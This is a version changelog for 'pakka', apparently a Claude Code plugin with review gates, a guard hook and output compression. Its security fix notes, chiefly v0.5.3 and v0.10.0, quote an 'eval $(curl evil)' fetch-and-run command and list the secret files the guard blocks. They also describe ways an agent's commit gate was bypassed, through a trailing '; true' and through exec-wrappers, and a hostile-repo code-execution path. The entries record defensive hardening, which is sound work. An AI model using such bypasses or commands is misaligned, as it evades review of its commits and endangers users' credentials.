pakka. v0.19.0 · shipped

pakka / changelog

changelog.

Shipped, not announced. Every release tagged in main, signed, pushed to the marketplace.

v0.19.0 2026-07-24

current shipped

Policy floor — a gate local settings cannot weaken.

A committed .pakka/policy.json is now enforced inside the binary — an org minimum that local settings can lower toward but never below. Strict-direction thresholds are clamped, locked guard categories fail closed on unknown names, input-compress can be locked, and a present policy forces the gate on regardless of a repo's local autoGate. Git is the distribution — commit the file and every clone inherits the floor, no server in the loop. Alongside it, marker freshness goes diff-bound: a review pass whose marker still matches the staged diff stays valid for 30 minutes instead of expiring on a 5-minute timer.

policy.

featCommitted .pakka/policy.json enforced in-binary as an org floor — strict-direction threshold clamps, locked guard categories fail closed on unknown names, input-compress lock.
featA present policy forces the gate on regardless of local autoGate. Git is the distribution — commit the file, every clone inherits the floor; no server.

gate · dx.

featMarker freshness is now diff-bound — a matching diff stays reviewed for 30 minutes instead of expiring on a 5-minute timer; 1-hour hard ceiling; policy may lower.

v0.18.0 2026-07-24

shipped

tag · v0.18.0

Consolidation — drift verified, upgrade nudge shipped.

The status line now surfaces when a newer plugin version is already sitting in your marketplace cache — a pure local readdir, zero network, with an ASCII fallback when the terminal can't render the glyph. Alongside it, a consolidation pass: the eval layer runs clean across every command and agent doc, the DESIGN.md v0 plan is marked historical, and the week's decisions are recorded.

statusline.

featUpgrade segment shows a newer cached plugin version when one exists — pure local readdir over the marketplace cache, zero network, ASCII fallback.

docs.

fixEval layer-1 clean across all command and agent docs; DESIGN.md v0 plan marked historical; the week's decisions recorded.

v0.17.0 2026-07-24

shipped

tag · v0.17.0

Hook latency — every budget passes.

The hooks on the hot path shed the fat binary's startup floor. A slim pakka-hot binary drops the two costs that dominated cold start — SQLite's ~4ms init and net/http's ~1.8ms — so the measured floor falls from 9.7ms to 3.8ms. The guard hook now lands p95 under its 10ms budget and commit-gate passthrough p95 at 4.2ms under its 5ms budget — both had been failing since v0.12.0.

perf.

perfSlim pakka-hot binary sheds the fat binary's startup floor — SQLite ~4ms + net/http ~1.8ms init measured out; hot-path floor 9.7ms → 3.8ms.
perfGuard hook p95 under its 10ms budget; commit-gate passthrough p95 4.2ms under its 5ms budget — both failing since v0.12.0, now passing.

statusline.

perfPer-project-dir resolution cached by mtime — unchanged dirs render with zero file opens and zero git execs.

v0.16.0 2026-07-23

shipped

tag · v0.16.0

Review provenance — commits carry what the review found.

A review pass no longer certifies only which diff it saw — it certifies what it found. review-pass --findings binds the verdict file's hash and its severity counts into the pass marker, and the gate re-hashes that evidence at commit time — swap the findings after the pass and the commit is blocked. The Reviewed-by-pakka trailer now carries both the diff and findings digests with their counts, and every finding's rationale is indexed for /pakka:recall.

gate.

featreview-pass --findings binds the verdict file hash and severity counts into the pass marker; the gate re-hashes at commit and blocks swapped evidence.
featThe Reviewed-by-pakka trailer carries diff + findings digests with their counts.
featFindings rationale is indexed and searchable via /pakka:recall.

v0.15.1 2026-07-22

shipped

tag · v0.15.1

spec-generate repo guard + compaction coverage pinned.

spec-generate now anchors its output to the git toplevel and errors when run outside a repo — it was CWD-relative before, and could file specs into the wrong repo. Plus a regression test pins the SessionStart matcher covering the compact source, so compaction re-injection can't silently regress; PostCompact-as-injector was investigated and rejected — Claude Code 2.1 discards its output.

spec-generate · fix.

fixOutput anchored to the git toplevel; errors when run outside a repo. Was CWD-relative and could file specs into the wrong repo.

hooks.

fixRegression test pins the SessionStart matcher covering source compact — compaction re-injection can't silently regress. PostCompact-as-injector investigated and rejected: Claude Code 2.1 discards its output.

v0.15.0 2026-07-22

shipped

tag · v0.15.0

Gate integrity — pass markers now bound to the reviewed diff.

A review pass now certifies a specific diff, not a moment in time. The review gate writes a JSON marker hashing the exact staged diff, and requires a fresh match before it will let a commit through — a pass earned for one diff can never authorize another. Legacy timestamp-only markers are rejected outright. On the fix path, the Reviewed-by-pakka attestation trailer verifies the diff hash before it stamps, and --trailer injection no longer collides with pathspec commits.

gate.

featA review pass writes a JSON marker hashing the exact staged diff; the gate requires a fresh match before allowing a commit — a pass for one diff can never authorize another. Legacy timestamp markers are rejected.

gate · fix.

fixThe Reviewed-by-pakka attestation trailer verifies the diff hash before stamping; --trailer injection no longer collides with pathspec commits.

v0.14.0 2026-07-22

shipped

tag · v0.14.0

Measured output reduction + data-loss fix.

The savings meter stops leaning on a calibrated constant where it has real data. Benchmark A/B runs now persist the measured per-repo reduction ratio, and the status line + RECEIPTS resolve that measured figure first — falling back to the calibrated constant only when no measurement exists, with the provenance disclosed either way. Plus a compression data-loss fix: empty-outputSHA state entries no longer clobber your edits with a stale snapshot.

meter.

featBenchmark A/B runs persist the measured per-repo reduction ratio. Status line + RECEIPTS resolve the measured figure first, calibrated-constant fallback only when no measurement exists — provenance disclosed as measured, n=K or default calibration.

compress · fix.

fixEmpty-outputSHA state entries no longer clobber user edits with a stale snapshot — the live file is adopted as the source of truth.

docs.

fixREADME gates-first positioning; cached-environment guidance added.

v0.13.0 2026-07-22

shipped

tag · v0.13.0

Enterprise-feedback release — honest savings accounting, opt-in input compression, verifiable supply chain.

Enterprise-feedback release — honest savings accounting, opt-in input compression, verifiable supply chain. The savings meter now prices input-side savings at a blended cache-aware rate instead of a flat fresh-input rate that overstated by ~10× in heavily cached environments. Input-file compression is opt-in and off by default. And every release is now reproducible and attested — clean-tree gate, -trimpath, SHA256SUMS, SLSA provenance, CycloneDX SBOM.

meter · pricing.

fixSavings meter prices input-side savings at a blended cache-aware rate — fresh 1× / cache-write 1.25× / cache-read 0.1× from session telemetry. Was a flat fresh-input rate that overstated savings by ~10× in heavily cached environments.

compress.

featInput-file compression is now opt-in, default off — enable with PAKKA_INPUT_COMPRESS=1 or pakka.compress.input.

release · supply-chain.

featReproducible releases — clean-tree gate, -trimpath, SHA256SUMS, SLSA provenance attestation, CycloneDX SBOM.

docs.

fixREADME egress wording made precise.

v0.12.1 2026-07-21

shipped

tag · v0.12.1

Hotfix — status-line $ saved restored to repo-cumulative.

A one-line regression from v0.12.0. The Claude Code 2.1 native payload is context-window-scoped; v0.12.0 let it feed the $-saved figure, narrowing it from repo-cumulative to the live session. The native payload now feeds only the context segment — every cumulative figure comes from the cached transcript scan again.

statusline.

fix$ saved figure is repo-cumulative again on CC 2.1 native payloads. v0.12.0 sourced the token figures — and thus the $-saved output side and savings-% denominator — from the session-scoped context_window.current_usage. The native payload now feeds only the ctx segment (#34, #35).

v0.12.0 2026-07-21

shipped

tag · v0.12.0

Consolidation — level convergence, CC 2.1 compat, measured hook latency.

Five PRs of hardening. Compression level fallbacks converge on a single source, so the configured level applies uniformly and the super-ultra default is now honest in both the runtime ruleset and the docs. The status line adopts Claude Code 2.1's native payload — context usage comes off hook stdin with zero transcript IO on the render path. And hook latency is now measured, not asserted.

compress · output-rules.

fixCompression level fallbacks converged on one source (semantic.ParseLevel via resolveOutputLevel) — the configured level now applies uniformly across the pipeline.
fixRuntime ruleset + command docs corrected to the super-ultra default — first release carrying the fix.

statusline · bench.

featClaude Code 2.1 native statusLine payload — context-window usage read from hook stdin, zero transcript IO on the render hot path; transcript-scan fallback retained for older Claude Code. Adds displayName to plugin.json.
featHook hot-path latency benchmark harness (make bench-latency) + benchmarks/latency-v0.12.0.md. Known: non-commit passthrough p95 9.2ms vs 5ms budget — shared binary startup floor, fix tracked in #17.

v0.11.0 2026-06-11

shipped

tag · v0.11.0

A fourth reviewer, a kill-switch, honest accounting.

Eight PRs. The review gate gains a performance lens. Guard learns a per-repo allowlist from your overrides and now covers secret writes, not just reads. Benchmarking runs through claude -p on your existing session — no API key. And the published output-tokens figure is re-based: the old sum-of-snapshots overcounted; canonical attribution doesn't.

review · guard.

featPerformance reviewer agent — fourth parallel review lens (kind="performance") plus 3 perf eval seeds.
featGuard learns a per-repo allowlist (.pakka/guard-allowlist.json) from repeated overrides, with override-count decay; secret categories never allowlistable. Hook matcher widened to Read|Write|Edit|MultiEdit|Bash — secret-write protection now active.

bench · meter.

featA/B harness via claude -p on your OAuth session — make bench, zero API-key dependency; PAKKA_DISABLED kill-switch disables every hook for the raw arm.
fixCanonical repo_root attribution (symlink-resolved, workspace-root aware) + historical backfill retag. Disclosure: cumulative output tokens re-based to ~1,019,833 — the previously published 5,939,566 summed repo-wide snapshots and overcounted. Corrected measurement, not a regression.

gate · compress · pricing.

fix[skip pakka] honored on AST reject paths; skill-check requires directive intent — bare keyword mentions no longer trigger, scan bounded ~1ms on adversarial input.
featSemantic rewriter injection gate — delta-based instruction-shape detection, strict fallback + audit entry on rejection. Pricing adds claude-fable-5, claude-mythos-5, claude-opus-4-8 + dated-ID prefix fallback.

v0.10.0 2026-06-11

shipped

tag · v0.10.0

Whole-codebase audit. Seven fixes.

An audit pass over the full codebase. The commit-gate closes the exec-wrapper bypass and stops running git on every Bash command; the status line reads the meter from a cache instead of rescanning transcripts per render; the meter stops colliding session files; recall stops crashing on FTS5 operator characters.

commit-gate.

fixIndirect commits via exec-wrappers (xargs, env, sudo, nohup, timeout, …) previously bypassed the gate ungated — now blocked.
fixReview-state git subprocesses skipped on non-commit Bash commands — removes per-command hot-path latency.
fixGate verdicts now written for chained and wrapped commit shapes recognised only by the AST path (new Decision.IsCommit).

statusline · meter.

perfMeter reads cached via meter-cache.json (mtime+size keyed) — no more full transcript rescan per render; $ savings labeled (est) to mark the constant-multiplier output estimate.
fixMeter filename now uses the full sanitized session id — was truncated to 8 chars, causing cross-session file collisions.

recall · report · core.

fixFTS5 queries sanitized — operator characters (:, (, *, ", AND) no longer crash recall.
fixReport output-tokens figure is now the max repo-filtered cumulative snapshot, not a triangular sum of snapshots.
fix~/.pakka/debug.log rotated at 2 MB — was unbounded.

v0.9.0 2026-06-02

shipped

tag · v0.9.0

The commit-gate, parsed properly.

v0.8.1's substring fallback was a stopgap. v0.9.0 closes the disease behind it: an AST-based shell parser via mvdan.cc/sh/v3 understands the eight shapes commits actually take — chained git add + commit + push, env prefix, subshells, redirects. The meter also stops shrinking when Claude Code rotates transcripts off disk.

commit-gate.

featAST-based parser via mvdan.cc/sh/v3 handles all real invocations — chained shapes (git add . && git commit -m … && git push), env-prefixed (GIT_AUTHOR=… git commit), subshells, redirects (criteria 1-8 of spec).
fixCloses the disease behind v0.8.1 — substring fallback no longer needed since AST covers the lawful shapes.

meter · core.

featpakka-core backfill-output-tokens. Recovers historical session output_tokens from transcripts still on disk.
fixMeter persists output_tokens per session-end — RECEIPTS figure now monotonic across releases (no longer shrinks as Claude Code rotates transcripts).

release.

fixChecklist step 1.5 part 2 made conditional; new substep 0.1 runnable doc-sync audit.

v0.8.1 2026-06-01

shipped

tag · v0.8.1

Commit-gate stops eating quoted arguments.

A non-git bash command that mentioned git commit inside a quoted string — a grep, an echo, a doc-fix — was getting rejected as if it were the real thing. The substring fallback now ignores quoted bodies.

commit-gate.

fixSubstring fallback no longer rejects non-git bash commands that mention git commit in quoted arguments (#3).

v0.8.0 2026-05-09

shipped

tag · v0.8.0

Your edits to compressed files survive.

If you edited a live compressed file and then changed compression level, the orchestrator used to silently overwrite your edits. It now detects the edit via OutputSHA comparison and adopts the live file as the new baseline before re-compressing. Snapshot refresh failure also now aborts the pass rather than proceeding with stale content.

orchestrator.

fixUser edits to live compressed files survive compression level changes — previously silently overwritten. Fix detects edit via OutputSHA comparison and adopts live file as new baseline before re-compressing.
fixSnapshot refresh failure now aborts the compression pass rather than proceeding with stale content — prevents live file overwrite when .original.md write fails.

state.

featOutputSHA field in Entry (JSON: outputSHA) — records SHA of last compression output; empty = legacy entry, user-edit check skipped.
featGetOutputSHA(absPath string) string method.

docs.

featSpec 2026-05-09-compress-user-edit-preservation.md (Status: implemented).

v0.7.0 2026-05-09

shipped

tag · v0.7.0

The validator, hardened.

Six validator fixes in one pass — single-char identifiers, env vars in all three forms, semver pre-release suffixes, case-insensitive markers, and language tags with # and . now all survive compression intact. Plus a meter calibration and rune-safe recall previews.

validator.

fixreInlineCode {2,} → {1,} — single-char identifiers (i, x, -v) now preserved.
fixreEnvVar extended to ${VAR}, ${var}, $var — braced and lowercase env var forms protected.
fixreVersion extended to semver pre-release/build suffixes — -rc1, +build.42 now preserved.
fixreMarker case-insensitive — todo, Todo, TODO all protected.
fixreFencedTriple/reFencedTilde language tag includes # and . — c#, f#, .proto fences validated.
fixrePathAbs trailing punctuation stripped from captures — fewer false-positive validator retries.

meter · recall · report.

fixestimateTokens calibrated to 3.5 bytes/token (was 4) — consistent with WriteSavings.
fixRune-safe preview truncation in recall — no more split UTF-8 codepoints in JSON output.
fixfmtInt MinInt64 guard in report — infinite recursion on crafted JSONL input eliminated.

core.

featinternal/claudecli extracted as shared package — single source of truth for claude -p argv construction across specfind and compress/semantic.
fixQuote chars (", ') added to shellMetaRe in stackgate — explicit unquoted-argv contract enforced.

v0.6.0 2026-05-09

shipped

tag · v0.6.0

Ten fixes. One faster status line.

Correctness sweep across compress, recall, the validator, and the commit gate. The status line stops doing an O(N) file walk on every render — transcript cache makes it O(1).

compress.

fixLanguage tag preserved on code fences in non-strict modes — was always stripped.
fixHeading dedup is consecutive-only — repeated headings in different sections no longer silently dropped.
fixNegative compression (inflation) now written to meter — honest aggregate accounting.

recall.

fixNon-EOF read errors no longer advance last_offset — silent index data loss eliminated.

guard.

fixSession nonce added to Reviewed-by-pakka: trailer — pre-planting forgery prevented.
fixshortSID sanitizes to [A-Za-z0-9_-] before truncating — path traversal via session ID eliminated.

linguistic.

fixmaybe/perhaps removed from drop list — epistemic inversion prevented.
fixArticle-a rule made case-sensitive — "Plan A", "Press A to continue", "vitamin A" no longer mangled.

validator.

fixStandalone integers ≥2 digits now preserved — ports, timeouts, counts were being dropped.
fixrePathAbs leading-anchor extended to :, =, ", ' — paths in config values now protected.

statusline.

perfTranscript cache at ~/.pakka/transcript-cache.json (mtime/size invalidation) — O(N) file walk → O(1) hot render.
perfcwdToRepo memoized in readAllTranscripts — O(N) git rev-parse per render → O(1).

v0.5.3 2026-05-09

shipped security

tag · v0.5.3

Three critical guards closed.

v0.5.3 ships three critical security fixes found in the guard layer. A hostile repo could execute arbitrary code on every git commit via the last-pass-ts path; a semicolon bypass let any commit skip the gate entirely; the validator silently passed negation and percentage inversions. All three are blocked.

security.

fix[CRITICAL] Git hook RCE. last-pass-ts read without validation; POSIX $(()) evaluated embedded $(…). Hostile repo pre-plants file → executes on every commit. Fixed: POSIX case guard rejects non-numeric values.
fix[CRITICAL] Commit-gate ; bypass. git commit -m 'msg' ; true caused IsGitCommit=false → Allow=true with zero review and zero audit trailers.
fix[CRITICAL] Validator negation/percentage blind spot. "Auth is not required" passed the validator unchanged. reNegation and rePercent preservation rules added.

guard.

fixWrite/Edit/MultiEdit/NotebookEdit fell through to Allowed — model could overwrite .env, git hooks, plugin scripts unchecked. checkWrite now routes all write-path tools through checkPath.
fixisDeniedPath was missing secret stores: ~/.config/gh/hosts.yml, ~/.kube/config, ~/.docker/config.json, ~/.npmrc, id_rsa*, *.pem, service-account*.json, and others now blocked.
fixevalRe bypassed via quoted -c: bash -c "eval $(curl evil)" was allowed. bashCEvalRe now inspects the quoted arg body.
fixAbsolute system path deny extended: /etc/passwd, /etc/shadow, /root, /proc/self/environ, /sys/kernel now blocked in Bash commands.

core.

fixDefault level divergence: ParseLevel and resolveLevel fallbacks returned ultra while loadOutputLevel returned super-ultra. All three paths now aligned to super-ultra.
fix[skip pakka] skips now emit a stderr notice and audit note user_skip → skip_marker.

v0.5.2 2026-05-08

shipped

tag · v0.5.2

Status line, fixed for real.

Three bugs caused the status line to show zero savings and phantom stale warnings for anyone running pakka from a parent directory. All three are closed; the stale glyph no longer fires on transient timeouts.

fixes.

fixBug count always 0: countBugsCaught only scanned exact repo dir; sessions from a parent dir missed findings in sub-repos. New countAllBugsCaught walks one level of child dirs.
fixSavings always $0 from parent dir: readAllMeter now prefix-matches (root+"/") so sub-repo sessions aggregate correctly.
fix! 1 stale persistent since v0.4.x: DECISIONS.md always timed out at 60s (actual: ~92s for 15KB at super-ultra). Transient rewrite errors no longer record validatorPasses=false. Timeout raised 60s → 180s.

v0.5.1 2026-05-08

shipped

tag · v0.5.1

Colors land in the binary.

v0.5.0 shipped the 24-bit ANSI color spec for the status line but the binaries were built before the color changes landed. v0.5.1 is the patch that makes them visible.

fixes.

fixStatus-line ANSI 24-bit colors missing from v0.5.0 binaries — savings now green #6FD08C, bugs caught now red #E8634A.

v0.5.0 2026-05-08

shipped

tag · v0.5.0

The spec gets a generator.

spec-generate arrives as a first-class subcommand. /pakka:plan now pipes directly into it. Review gets spec-drift detection — a warning-level finding when the spec itself changed on the current branch.

spec.

featpakka-core spec-generate. Validates 6 required sections, writes to docs/specs/YYYY-MM-DD-<slug>.md, hybrid diff on amend. Slug validated against path traversal.
feat/pakka:plan now pipes spec content to spec-generate via Bash — no Write tool required.

review.

featSpec-drift detection. Warning-level finding when the spec file was modified on the current branch before merge — surfaces before you approve.

fixes.

fixStatus-line CWD: now derives from transcript_path directory instead of event.CWD — corrects savings display from ~$6 to ~$46 on split-repo setups.

v0.4.1 2026-05-07

shipped

tag · v0.4.1 · a2f4d19

Findings learn to cite.

The reviewer agent now anchors every finding to a concrete line range and (when applicable) a clause in the spec it sourced. This is the change that makes /pakka:review output reviewable in code review, not just over-the-shoulder.

review.

featSpec-anchored findings. Every finding now carries a cites array (spec §, RFC, ADR, prior turn).
featLine-range anchors. Reviewer reports file:[start,end] instead of full-file callouts.
perfReviewer panel runs ~3× faster on diffs over 200 lines.

fixes.

fixArchitect agent no longer double-reports the same advisory across re-reviews.
fixCommit-gate last-pass-ts: was always false for git -C <path> commit. parseCPath + resolveReviewsDir now derive repo root from the commit command.

v0.4.0 2026-05-05

shipped breaking

tag · v0.4.0 · 1b7c003

The spec finds itself.

Gate now reads the spec. pakka-core spec-find discovers the right spec file for the current change and injects it into all three reviewer agents. Findings cite spec clauses, not just line numbers. The merge bar moves from "the model said it's fine" to a thing you can audit.

review.

featpakka-core spec-find. Discovers spec file via name match → LLM fallback.
featSpec-anchored review. Matched spec injected into all three reviewer agent prompts.
featReviewer agents emit spec-divergence findings against spec acceptance criteria.

spec.

breakingfinding object replaces concern. Migration: rename + drop severity_text.
featAdded verdict object as the single review result envelope.

v0.3.0 2026-05-02

shipped

tag · v0.3.0 · 5ce91a2

Memory across sessions.

recall arrives. Decisions, contracts, gotchas, customs, and people are extracted as they happen and written to a plain JSONL store the team shares via git. Compress also gets its top mode.

compress.

featsuper-ultra mode. ~66% reduction; auto-extracts decisions before discarding turns.

recall.

featFTS5 full-text index over audit trail. index subcommand is idempotent.
featStorage at .pakka/recall/; gitignored or shared, your choice.
feat/pakka:recall. Natural-language query with cited results.
featSessionEnd hook: fires pakka-core index — current session entries queryable before next session starts.

v0.2.0 2026-05-02

prior

tag · v0.2.0 · 9f0bd4e

The diet, calibrated.

First version of compress with measured savings. Token-call noise condensed; decisions promoted; four compression levels landed with real benchmark numbers.

compress.

featFour levels: lite · strict · ultra · super-ultra. Token-aware turn condensation with a mode dial.
perfCalibrated from real bench: super-ultra ~66%, ultra ~55%, strict ~33%, lite ~27%.
feat/pakka:plan · /pakka:build · /pakka:review hub commands replace 14 individual skill commands.

v0.1.0 2026-05-02

prior

tag · v0.1.0 · 0001-of-many

Hello, harness.

First commit. Plugin manifest, marketplace registration, the slash-command surface area. Nothing useful yet — but the scaffold the rest of pakka grows from.

core.

featClaude Code plugin manifest; install via /plugin install pakka@pakka-marketplace.
featSlash-command stubs for plan, review, recall.
feat4-vector output compression with levels: lite · strict · ultra · super-ultra.